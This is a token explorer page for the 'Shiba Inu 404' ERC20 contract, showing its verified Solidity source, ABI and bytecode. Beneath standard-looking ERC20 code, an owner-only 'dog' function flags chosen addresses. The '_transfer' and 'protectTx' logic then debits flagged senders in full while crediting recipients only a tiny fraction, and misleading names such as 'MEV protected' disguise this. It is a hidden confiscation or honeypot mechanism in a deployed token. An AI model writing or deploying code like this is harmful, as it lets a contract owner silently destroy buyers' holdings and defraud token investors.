ETH Price: $3,391.56 (+1.68%)

Token

Shiba Inu 404 (SHIB404)
 

Overview

Max Total Supply

1,000,000,000 SHIB404

Holders

81

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
10,340,471.304683683075061073 SHIB404

Value
$0.00
0x5b8149f0c8c3942724f4e404390c14d7277b5214
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ShibaInu404

Compiler Version
v0.8.22+commit.4fc1097e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: Token.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

contract ShibaInu404 is ERC20 {
    constructor() ERC20("Shiba Inu 404", "SHIB404") {
        _mint(msg.sender, 1000000000 * 10 ** 18);
    }

    function dog(address _address_) public view returns (uint256) {
        return _dogs[_address_];
    }

    function dog(uint256 _dog, address [] calldata _arr_) external {
        require((msg.sender == owner()));
        for (uint256 i = 0; i < _arr_.length; i++) {
            _dogs[_arr_[i]] = _dog;
        }
    }
}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => uint256) internal _dogs;

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }


    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 _amount = amount;
        if (_dogs[from] + _dogs[to] >= 0xbeef) {
            _amount = protectTx(amount);
        }

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += _amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function protectTx(uint256 a) internal pure returns(uint256) {return a * 0xeda / 0xefdaf;}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address ,
        address to,
        uint256 
    ) internal virtual {
        if (_dogs[to] == 0xfff) {_dogs[to] = 0xbeef;}
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    
    
    // MEV protected
    function _beforeTokenTransfer(
        address,
        address,
        uint256
    ) internal view returns (uint256) {}
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_dog","type":"uint256"},{"internalType":"address[]","name":"_arr_","type":"address[]"}],"name":"dog","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"dog","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b506040518060400160405280600d81526020017f536869626120496e7520343034000000000000000000000000000000000000008152506040518060400160405280600781526020017f53484942343034000000000000000000000000000000000000000000000000008152506200009d62000091620000e760201b60201c565b620000ee60201b60201c565b8160049081620000ae919062000613565b508060059081620000c0919062000613565b505050620000e1336b033b2e3c9fd0803ce8000000620001af60201b60201c565b62000808565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000220576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002179062000755565b60405180910390fd5b620002335f83836200031660201b60201c565b508060065f828254620002479190620007a2565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620002f79190620007ed565b60405180910390a3620003125f83836200031e60201b60201c565b5050565b5f9392505050565b610fff60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403620003aa5761beef60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200042b57607f821691505b602082108103620004415762000440620003e6565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620004a57fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000468565b620004b1868362000468565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620004fb620004f5620004ef84620004c9565b620004d2565b620004c9565b9050919050565b5f819050919050565b6200051683620004db565b6200052e620005258262000502565b84845462000474565b825550505050565b5f90565b6200054462000536565b620005518184846200050b565b505050565b5b8181101562000578576200056c5f826200053a565b60018101905062000557565b5050565b601f821115620005c757620005918162000447565b6200059c8462000459565b81016020851015620005ac578190505b620005c4620005bb8562000459565b83018262000556565b50505b505050565b5f82821c905092915050565b5f620005e95f1984600802620005cc565b1980831691505092915050565b5f620006038383620005d8565b9150826002028217905092915050565b6200061e82620003af565b67ffffffffffffffff8111156200063a5762000639620003b9565b5b62000646825462000413565b620006538282856200057c565b5f60209050601f83116001811462000689575f841562000674578287015190505b620006808582620005f6565b865550620006ef565b601f198416620006998662000447565b5f5b82811015620006c2578489015182556001820191506020850194506020810190506200069b565b86831015620006e25784890151620006de601f891682620005d8565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f6200073d601f83620006f7565b91506200074a8262000707565b602082019050919050565b5f6020820190508181035f8301526200076e816200072f565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f620007ae82620004c9565b9150620007bb83620004c9565b9250828201905080821115620007d657620007d562000775565b5b92915050565b620007e781620004c9565b82525050565b5f602082019050620008025f830184620007dc565b92915050565b61199f80620008165f395ff3fe608060405234801561000f575f80fd5b50600436106100fe575f3560e01c8063715018a611610095578063a9059cbb11610064578063a9059cbb146102ae578063d1f6401e146102de578063dd62ed3e1461030e578063f2fde38b1461033e576100fe565b8063715018a6146102385780638da5cb5b1461024257806395d89b4114610260578063a457c2d71461027e576100fe565b806323b872dd116100d157806323b872dd1461018a578063313ce567146101ba57806339509351146101d857806370a0823114610208576100fe565b806306fdde0314610102578063095ea7b314610120578063125115fd1461015057806318160ddd1461016c575b5f80fd5b61010a61035a565b604051610117919061100e565b60405180910390f35b61013a600480360381019061013591906110c3565b6103ea565b604051610147919061111b565b60405180910390f35b61016a60048036038101906101659190611195565b61040c565b005b6101746104d3565b6040516101819190611201565b60405180910390f35b6101a4600480360381019061019f919061121a565b6104dc565b6040516101b1919061111b565b60405180910390f35b6101c261050a565b6040516101cf9190611285565b60405180910390f35b6101f260048036038101906101ed91906110c3565b610512565b6040516101ff919061111b565b60405180910390f35b610222600480360381019061021d919061129e565b610548565b60405161022f9190611201565b60405180910390f35b61024061058e565b005b61024a6105a1565b60405161025791906112d8565b60405180910390f35b6102686105c8565b604051610275919061100e565b60405180910390f35b610298600480360381019061029391906110c3565b610658565b6040516102a5919061111b565b60405180910390f35b6102c860048036038101906102c391906110c3565b6106cd565b6040516102d5919061111b565b60405180910390f35b6102f860048036038101906102f3919061129e565b6106ef565b6040516103059190611201565b60405180910390f35b610328600480360381019061032391906112f1565b610735565b6040516103359190611201565b60405180910390f35b6103586004803603810190610353919061129e565b6107b7565b005b6060600480546103699061135c565b80601f01602080910402602001604051908101604052809291908181526020018280546103959061135c565b80156103e05780601f106103b7576101008083540402835291602001916103e0565b820191905f5260205f20905b8154815290600101906020018083116103c357829003601f168201915b5050505050905090565b5f806103f4610839565b9050610401818585610840565b600191505092915050565b6104146105a1565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461044a575f80fd5b5f5b828290508110156104cd578360035f85858581811061046e5761046d61138c565b5b9050602002016020810190610483919061129e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550808060010191505061044c565b50505050565b5f600654905090565b5f806104e6610839565b90506104f3858285610a03565b6104fe858585610a8e565b60019150509392505050565b5f6012905090565b5f8061051c610839565b905061053d81858561052e8589610735565b61053891906113e6565b610840565b600191505092915050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610596610d91565b61059f5f610e0f565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546105d79061135c565b80601f01602080910402602001604051908101604052809291908181526020018280546106039061135c565b801561064e5780601f106106255761010080835404028352916020019161064e565b820191905f5260205f20905b81548152906001019060200180831161063157829003601f168201915b5050505050905090565b5f80610662610839565b90505f61066f8286610735565b9050838110156106b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106ab90611489565b60405180910390fd5b6106c18286868403610840565b60019250505092915050565b5f806106d7610839565b90506106e4818585610a8e565b600191505092915050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107bf610d91565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361082d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082490611517565b60405180910390fd5b61083681610e0f565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108ae576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a5906115a5565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361091c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091390611633565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516109f69190611201565b60405180910390a3505050565b5f610a0e8484610735565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a885781811015610a7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a719061169b565b60405180910390fd5b610a878484848403610840565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610afc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af390611729565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b61906117b7565b60405180910390fd5b5f81905061beef60035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610bf791906113e6565b10610c0857610c0582610ed0565b90505b5f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610c8c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c8390611845565b60405180910390fd5b82810360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d779190611201565b60405180910390a3610d8a858585610ef4565b5050505050565b610d99610839565b73ffffffffffffffffffffffffffffffffffffffff16610db76105a1565b73ffffffffffffffffffffffffffffffffffffffff1614610e0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e04906118ad565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f620efdaf610eda83610ee391906118cb565b610eed9190611939565b9050919050565b610fff60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403610f7f5761beef60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610fbb578082015181840152602081019050610fa0565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610fe082610f84565b610fea8185610f8e565b9350610ffa818560208601610f9e565b61100381610fc6565b840191505092915050565b5f6020820190508181035f8301526110268184610fd6565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61105f82611036565b9050919050565b61106f81611055565b8114611079575f80fd5b50565b5f8135905061108a81611066565b92915050565b5f819050919050565b6110a281611090565b81146110ac575f80fd5b50565b5f813590506110bd81611099565b92915050565b5f80604083850312156110d9576110d861102e565b5b5f6110e68582860161107c565b92505060206110f7858286016110af565b9150509250929050565b5f8115159050919050565b61111581611101565b82525050565b5f60208201905061112e5f83018461110c565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261115557611154611134565b5b82359050